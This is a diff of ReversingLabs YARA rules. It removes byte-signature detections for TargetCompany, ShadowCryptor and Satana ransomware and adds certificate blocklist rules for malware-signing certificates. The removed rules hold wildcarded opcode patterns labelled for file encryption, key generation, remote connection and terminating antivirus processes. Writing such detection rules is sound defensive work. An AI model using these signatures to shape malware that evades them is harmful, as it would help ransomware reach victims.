 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "05fa81afa8aa1e3b9955ad24a274ddef4fb32d678902af7aae6d6c67ed3bf0fd"
+		logic_hash = "337dc486f2bdca1f7682887d5e5c0f82961850a8fd9c9a20b9a43a75334070d8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TargetCompany"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 53 68 ?? ?? ?? ?? 6A ?? 53 6A
-            ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? BF ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8D 75 ?? E8 ?? ?? ??
-            ?? 50 89 5D ?? E8 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59
-            E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 53 68
-            ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 6A ?? 5F 53 57 56 FF B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 57 52 50
-            89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 33 FF 3B F3 89 85
-            ?? ?? ?? ?? 7F ?? 7C ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 33 FF 47 EB ?? B9 ?? ??
-            ?? ?? 3B C1 73 ?? 53 51 56 FF B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 50
-        }
-		$encrypt_files_p2 = {
-            56 FF B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 89 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 3B FB 8B 3D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 FF B5 ??
-            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? ?? ?? ?? 8D 4D
-            ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 FF B5 ??
-            ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? FF D6 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 86 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 53 53 FF B5 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ??
-            ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53
-            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 01 85
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 11 85 ?? ?? ?? ?? FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 FF B5 ?? ?? ?? ?? FF D7 8B
-            BD ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ??
-            ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
-            D6 57 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? 53 56 33 F6 57 8D 5D ?? 89 75 ?? E8 ?? ?? ?? ?? 89 75 ?? 56 56 56
-            FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 3B DE 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 FF 6A ?? 8D
-            45 ?? 50 FF 74 BD ?? 53 FF 15 ?? ?? ?? ?? 47 83 FF ?? 72 ?? 56 56 6A ?? 56 56 FF 75
-            ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ??
-            B8 ?? ?? ?? ?? 0F 95 C1 56 49 23 C8 03 C8 81 C9 ?? ?? ?? ?? 51 56 56 56 FF 75 ?? 89
-            4D ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 6A ??
-            5F 8D 45 ?? 50 8D 45 ?? 50 6A ?? 53 89 7D ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            81 4D ?? ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF
-            75 ?? F7 D8 1B C0 50 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 56 56 8D 45 ??
-            50 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C7 50 FF 75 ?? E8 ?? ?? ??
-            ?? 59 59 8D 4D ?? 51 FF 75 ?? 89 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? ?? 03 7D ?? 39 75
-            ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            39 75 ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ??
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B C9 C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 9D ?? ?? ?? ??
-            8B F9 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 45
-            ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 75
-            ?? B8 ?? ?? ?? ?? 50 8D 45 ?? 50 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F8 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 59 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 59 FF B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 5F 5E 33
-            CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$generate_key = {
-            0F 31 0F AF C8 0F AF CE 0F AF 8D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 33 FF 47 57 53 53
-            8D 85 ?? ?? ?? ?? 50 89 8D ?? ?? ?? ?? FF D6 3B C3 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 75 ?? 6A ?? 57 53 53 8D 85 ?? ?? ?? ?? 50 FF D6 3B C3 74 ?? 8D 85 ?? ?? ?? ??
-            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 59 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C7
-            B9 ?? ?? ?? ?? 8B 11 8B F2 C1 EE ?? 33 F2 69 F6 ?? ?? ?? ?? 03 F0 89 71 ?? 83 C1 ??
-            40 81 F9 ?? ?? ?? ?? 7C ?? 57 A3 ?? ?? ?? ?? FF 15
-        }
-		$find_files_p1 = {
-            8D 85 ?? ?? ?? ?? 53 53 50 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            D6 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 33 F6 0F B7
-            C6 FF 34 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 46 66 83 FE ?? 72 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 0F B7 B5 ?? ?? ?? ?? 8D 34 B5
-        }
-		$find_files_p2 = {
-            FF 36 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D3 FF 36 89 85 ?? ??
-            ?? ?? FF D3 8B 8D ?? ?? ?? ?? 3B C8 0F 84 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 66 83 BD ??
-            ?? ?? ?? ?? 72 ?? C6 85 ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? FF 34 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FE 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
-            ?? 72 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 ?? 6A ?? 59 FF B5 ?? ?? ?? ?? 33 C0
-            8B FE F3 AB 66 8B 85 ?? ?? ?? ?? 66 89 46 ?? FF D3 8D 44 00 ?? 50 E8 ?? ?? ?? ?? 59
-            FF B5 ?? ?? ?? ?? 89 46 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 EB ?? 56 FF 15 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B
-            4D ?? 5F 5E 33 CD 33 C0 5B E8 ?? ?? ?? ?? C9 C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexsandro Da Rosa - ME" and ( pe.signatures [ i ] . serial == "00:9a:72:7e:20:0e:a7:65:70" or pe.signatures [ i ] . serial == "9a:72:7e:20:0e:a7:65:70" ) and 1539056530 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "89f3a334-cd2f-51b9-83b2-2baca3c59ba5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13004-L13020"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "164b064a9df31d4a122236dfee7b713417a44d47a7f304b2bf55686a7f038feb"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dialer Access" and pe.signatures [ i ] . serial == "09:54:a3:c8:76:df:92:62:cd:e5:81:7f:98:70:f0:c6" and 1160438400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Shadowcryptor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ShadowCryptor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "983e8927-4829-540f-9697-886226fd54ce"
-		date = "2021-02-11"
-		modified = "2021-02-11"
+		id = "ad7d8be0-ecb1-508f-bfce-7a5cecfd4e2f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ShadowCryptor.yara#L1-L89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13022-L13038"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "875150db9fc36cd992988bba7d0c05487418b901980bf428ebd427c82fbcacd7"
+		logic_hash = "260a58669043d21ee0ffccbdee95c9d04ef338497685d42f1951660f658a164d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ShadowCryptor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 0F 43 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ??
-            8D A4 24 ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 33 C0 83 7D
-            ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
-            ?? ?? ?? ?? 83 F8 ?? 74 ?? A8 ?? 74 ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? EB ?? 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 C7 ?? 83 D6 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 8B C7 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ??
-            33 C4 89 44 24 ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B
-            F1 8D 46 ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 39 46 ?? 0F 84 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
-            80 7E ?? ?? 0F 85 ?? ?? ?? ?? 51 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 4E ?? E8 ?? ?? ??
-            ?? 8B C8 E8 ?? ?? ?? ?? 8B D0 8B 02 85 C0 74 ?? 8B 00 8B 48 ?? 8B 40 ?? 49 23 4A ??
-            8B 04 88 8D 4C 24 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? 8B 4E ?? 48
-            03 C8 8B 46 ?? 48 23 C8 8B 46 ?? 8B 3C 88 83 7F ?? ?? 72 ?? FF 37 E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 66 89 07 FF 4E ?? 75 ?? 89 46
-            ?? 83 EC ?? 8B CC 6A ?? 89 41 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 44 24 ??
-            50 E8 ?? ?? ?? ?? 51 8B CE E8 ?? ?? ?? ?? 8B C8 0B CA 74 ?? 01 46 ?? 11 56 ?? 83 7C
-            24 ?? ?? 8D 54 24 ?? 0F 43 54 24 ?? 83 EC ?? 8B FC 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47
-            ?? ?? ?? ?? ?? 66 89 07 66 39 02 74 ?? 8B C2 8D 48 ?? 89 4C 24 ?? 66 8B 08 83 C0 ??
-            66 85 C9 75 ?? 2B 44 24 ?? D1 F8 50 52 8B CF E8 ?? ?? ?? ?? 8B 4E ?? 83 79 ?? ?? 8D
-            41 ?? 72 ?? 8B 00 8B 91 ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 09 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4C 24 ?? 33
-            CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$terminate_antivirus_processes_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 33 C0 C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 66 89 03 89
-            45 ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$terminate_antivirus_processes_p2 = {
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 49 ?? 33 F6 8B BC B5 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 39 43 ?? 74 ?? 6A ?? 68 ??
-            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 66 83 3F ?? 75 ?? 33 C0 EB ?? 8B C7 8D 50 ?? 8D 49 ??
-            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 50 57 8B CB E8 ?? ?? ?? ?? 46 83 FE ??
-            72 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF
-            15 ?? ?? ?? ?? 8B C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ??
-            ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CPM Media, Ltd." and pe.signatures [ i ] . serial == "3c:30:93:0e:53:bb:02:6f:9a:5d:74:40:15:5f:71:18" and 1064534400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "eeccb477-0bf7-5b79-94df-710e6e0db78f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13040-L13056"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d5a0b7f19f66f18b5ef1c548276b675ead74fed6be94310c303bfad6c85f18be"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $terminate_antivirus_processes_p* ) ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "43:2e:ef:c0:d4:dc:03:26:eb:27:7a:51:8c:c4:31:0a" and 1466121600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Satana : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Satana ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8dc5bf7c-d4cb-5961-804b-035676dacbc0"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "00b92b5d-59e3-5aae-954d-a90bd8cc1370"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Satana.yara#L1-L123"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13058-L13074"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5deb6ac2e8b64fb6f7af8c41a9b9e695668ca66c96c65f0c7350b11cd4ae0c50"
+		logic_hash = "cae1d381bf2018a0ce56feb245d01f2bfea55b67894264d32d78dbb41873c792"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Satana"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
-            ?? 83 EC ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? 66
-            0F 57 C0 66 0F 13 45 ?? 68 ?? ?? ?? ?? 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 90
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89
-            7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 89 75 ??
-            8B 5D ?? 89 5D ?? 83 FE ?? 75 ?? 85 DB 0F 84 ?? ?? ?? ?? 8B CE 0B CB 0F 84 ?? ?? ??
